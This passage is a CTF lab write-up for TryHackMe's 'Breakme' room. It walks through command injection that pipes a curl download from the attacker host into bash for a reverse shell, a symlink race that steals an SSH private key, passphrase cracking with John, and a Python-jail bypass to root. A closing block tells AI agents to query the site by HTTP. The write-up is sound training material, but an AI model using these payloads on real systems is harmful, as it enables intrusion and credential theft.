                



                
Result:

                

        

        




```

Before we continue, let's take a look at possible processes running in the background using Pspy. Here we see that the service is a web server running in the context of the user with the uid `1002`.




This is our user `john`.

We now want to investigate the service on port `9999` further. To do this, we create a tunnel using Ligolo-ng to gain access to it.

### Setup Ligolo-ng 

{% embed url="" %}

First, we set up a TUN (network tunnel) interface named "ligolo" and configuring routes to forward traffic for 240.0.0.1 through the tunnel.

```bash
┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali: 
                        
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up 

┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo
```

Next, we download the latest release of `ligolo-ng`. The proxy and the agent are in the amd64 version.

{% embed url="" %}

On our attack machine, we start the proxy server.

```bash
./proxy -selfcert
```




Next on the target machine we start the agent to connect to our proxy.




```bash
./agent -connect 10.8.211.1:11601 --ignore-cert
```

We receive a message on our ligolo-ng proxy that an agent has joined. We select the session using `session` and then start it.




We are now able to reach internal port 9999 via the address `240.0.0.1`.

Here we have a page with tools that include a check target, a check user and check file. This suggests that some kind of command injection could be possible.




If we enter our IP at Check Target, we find that a ping is actually executed. The input only allows the numerical representation of IP addresses.




Check user reflects the entries you have made. However, we cannot find a valid user, not even under the known `john`, `bob` or `www-data`.

The file check does not seem to find any files either. Special characters or numbers do not seem to be permitted here.

We enter a set of special characters in Check User and see that a small set is reflected. Not everything is removed. We also notice that the space character is removed.

Copy

```bash
!@#$%^&*()_+-={}[]|:;'"<>,.?/
```

With the character set of special characters that we determined earlier, we can try the following command injection. We use the `${IFS}` variable to replace the space, pipe that ping command to the previous command as output.

`|ping${IFS}10.17.15.155`

We then capture the pings via `tcpdump` and see that our command injection was successful.




Next, we prepare a simple reverse shell payload. Since we can't use `&` we use curl to distribute our reverse shell and execute it in the same command.

Then we set up a Python web server to provide the payload.

We replace our ping with a curl command, to see if we can successfully request the payload.

Copy

```
|curl${IFS}http://10.17.15.155/payload.sh
```




Now we set up a listener on port `4446` and adapt our command with a pipe to bash.

```
|curl${IFS}http://10.17.15.155/payload.sh|bash
```




This gives us our first flag.




## Reverse Shell as Youcef

In the home directory of `youcef` we find that we have access to other files, including `readfile`.

We want to take a closer look at the files and set up a python web server in the home directory to access these.

Initially, we decompile the `readfile` binary since we lack access to `readfile.c`. This binary has the SUID bit set, allowing us to read files with the privileges of its owner, Youcef. We hope to retrieve Youcef's SSH key. However, attempts to read the file result in a "file not found" error, and our access to `readfile.c` returns a `Nice Try!` message, indicating restrictions in place.

After decompiling the binary, we discover that it includes checks to verify if the user is `john` by searching for the UID. It also prevents access to specific filenames like `flag` and `id_rsa`, resulting in a `Nice Try!` message if those are attempted. Additionally, the program checks for symlinks, which if opened, also fail, along with any files to which user `john` does not have access.

The application first checks if an argument is supplied, otherwise it exits with a usage message. It then verifies if the file exists, exits if it doesn't, and ensures the user is running with UID 1002 (john). If the filename contains `flag` or `id_rsa`, or is a symlink, access is denied. However, if the file passes these checks, the program waits briefly (usleep) before opening and printing the file. This delay introduces a race condition, allowing exploitation between the file check and access (TOCTOU vulnerability).

### Race Condition 

To exploit the race condition vulnerability, we can create a regular file and rapidly toggle it between a regular file and a symlink pointing to the desired file (e.g., youcef’s file). The goal is that during the application's check, it detects the regular file and allows access. But by the time the program opens and reads the file, the symlink points to the target file we wish to access, bypassing the restrictions.

For this, we will first use a loop to constantly switch the file between these two states and run it in the background.

{% code overflow="wrap" %}

```bash
while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &
```

{% endcode %}

Now, we will create another loop that continuously runs the program, hoping to win the race condition. If we succeed, it will print the output and exit.

```bash
for i in {1..30}; do /home/youcef/readfile symlink; done
```

As we can see, after a while, we win the race and manage to read `/home/youcef/.ssh/id_rsa`.




### SSH Connection 

Now that we have the SSH key, we encounter an additional obstacle: the key is encrypted with a passphrase. To gain access, we will need to crack or bypass this passphrase in order to use the SSH key and establish a shell on the target system.

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':
```

We can attempt to brute-force the passphrase. First, we need to convert the SSH key into a format that *John the Ripper* can work with. 

```bash
$ ssh2john id_rsa > ssh_key.hash
```

We do this using the `ssh2john` utility, which transforms the SSH private key into a hash that *John the Ripper* can recognize and attempt to crack. 

After converting the key, we can run *John* to start brute-forcing the passphrase and potentially gain access to the decrypted SSH key.

Now, using `john` to crack it, we obtain the passphrase.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED]          (id_rsa)     
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

```

{% endcode %}

Using the SSH key and the passphrase we found, we successfully access the system as the user "youcef." 

With this shell access, we can now explore the system further and locate the second flag. 

By having control over the "youcef" account, we can read files and execute commands under this user, allowing us to progress further in the challenge.

```bash
┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm                             
Enter passphrase for key 'id_rsa': 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)
```

This gives us our 2nd flag.




## Privilege Escalation

{% code overflow="wrap" %}

```bash
youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User youcef may run the following commands on breakme:
    (root) NOPASSWD: /usr/bin/python3 /root/jail.py
```

{% endcode %}

Executing the program reveals that we are operating within a Python jail, which prompts us for input. 

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> 
```

Upon testing the input, we discover that entering invalid Python code triggers a "Wrong Input" message. .

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> 
```

When we input valid Python code, it executes successfully, indicating that our input is likely being passed directly to the `exec` function.

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>> 
```

However, if we try to import a module to run commands, we see the message `Illegal Input` and the program exits. This indicates that there must be some filtering in place.

```bash
>> import os
Illegal Input
youcef@Breakme:~$ 
```

Since directly spawning a shell or utilizing typical programs for this purpose is restricted, we should explore alternative methods to gain shell access. We might consider leveraging scripting techniques, utilizing file redirection, or finding executables that allow indirect access. Exploring environment variables or existing permissions could also present opportunities for executing commands that would lead to a shell.

Looking for common Python jail bypass payloads, we find the following payload [here](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#builtins). It imports the `os` module and calls the `system` function from it:

* `__builtins__.__import__("os").system("ls")`

But, if we try it in our case, we see that it fails.

```bash
>> __builtins__.__import__("os").system("ls")
Illegal Input
```

To begin our exploration, we first attempt to access the `import` function using `__builtins__.__import__`. However, we quickly discover that this functionality is restricted.

```bash
>> __builtins__.__import__
Illegal Input
```

By breaking down our payload and testing its individual components, we determine that the problem originates from the `__import__` function and the quotation marks.

```bash
>> __builtins__
>> __import__
Illegal Input
>> "
Illegal Input
```

To bypass the issue with quotation marks, we can use single quotes ('). 

For the `__import__` function, instead of calling it directly as `__builtins__.__import__`, we can access it through the dictionary method with `__builtins__.__dict__['__import__']`. 

This approach allows us to provide `__import__` as a string, which we can manipulate using various string methods to circumvent filters. For instance, the application accepts `__IMPORT__`, enabling us to modify it to `__import__`.

For instance, we see that the application has no issue with `__IMPORT__`.

```bash
>> __IMPORT__
Wrong Input
```

We can utilize `__IMPORT__` and then apply a method to convert it to `__import__`. One method we can use is `lower()`, which transforms all uppercase letters into lowercase.

```bash
>> __builtins__.__dict__['__IMPORT__'.lower()]
Illegal Input
```

Testing the parts of our input once more, we find that `lower` is also not allowed.

```bash
>> __builtins__
>> __dict__
Wrong Input
>> []
>> ()
>> '
Wrong Input
>> __IMPORT__
Wrong Input
>> lower
Illegal Input
```

Looking for alternatives to the `lower` method, we find the `casefold` method, which serves a similar purpose. As we can see, this method is not filtered and works.

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()])

```

Returning to our payload, we find that when we attempt to import the `os` module, it is also not allowed, and we can see the reason why: `os` is filtered as well.

```bash
>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input
```

Since `os` is already supplied as a string and `OS` is not filtered, we can use the `casefold` method once more to bypass it.

As we can see, this works, and we are able to access the `os` module

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))

```

However, if we try to access the `system` function, we find that we fail once more.

```bash
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).system
Illegal Input
```

This time, it’s because `system` is filtered.

```bash
>> system
Illegal Input
```

Now, we can use `__dict__` once more to be able to use `system` as a string and apply the `casefold` method to bypass the filter.

As we can see, this allows us to access the `system` function successfully.

{% code overflow="wrap" %}

```bash
>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])

```

{% endcode %}

By using the payload `__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')`, we can spawn the Yorick interpreter. Once inside the Yorick environment, we can execute the command `system "bash"` to launch a shell as the root user. This allows us to access and read the third flag, leveraging the vulnerabilities in the Python execution context.

{% code overflow="wrap" %}

```bash
youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail
  Will you stay locked forever
  Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')

 Copyright (c) 2005.  The Regents of the University of California.
 All rights reserved.  Yorick 2.2.04 ready.  For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)
```

{% endcode %}

We get our root flag.





---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/2024/breakme.md?ask=
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.